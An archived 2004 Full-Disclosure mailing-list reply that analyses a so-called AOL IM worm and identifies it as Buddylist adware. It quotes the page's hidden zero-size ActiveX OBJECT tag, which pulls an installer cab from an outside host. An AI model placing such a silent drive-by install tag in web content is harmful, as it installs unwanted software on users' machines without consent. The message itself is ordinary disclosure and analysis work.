[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SV: [Full-Disclosure] AOL IM Worm

To: "'Keith W. McCammon'" <keith-list@mccammon.org>, "'Full Disclosure List'" <full-disclosure@netsys.com>
Subject: SV: [Full-Disclosure] AOL IM Worm
From: "Peter Kruse" <kruse@krusesecurity.dk>
Date: Wed, 11 Feb 2004 21:18:24 +0100

Hi,

It´s a Buddylist Adware. The page uses codebase object to run the
ActiveX component:

<OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0
CLASSID="CLSID:FDDCE9FF-1FC6-413c-80B1-37B101FDA1D4"
CODEBASE="http://download.buddylinks.net/ShellInstaller.cab#Version=1,0,
0,001">

The cab file contains the files Shellinstaller.ini (2.119 bytes) and the
binary ShellInstaller.ocx (81.920 bytes). The activex component hooks
itself to IE and works as a typical adware component. No virus code
here.

McAfee has posted a writeup at this URL:
http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=101007

Regards
Peter Kruse

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- Re: [Full-Disclosure] AOL IM Worm
  - From: "Keith W. McCammon" <keith-list@mccammon.org>

Prev by Date: Re: [Full-Disclosure] AOL IM Worm
Next by Date: Re: [Full-Disclosure] AOL IM Worm
Previous by thread: Re: [Full-Disclosure] AOL IM Worm
Next by thread: Re: [Full-Disclosure] AOL IM Worm
Index(es):
- Date
- Thread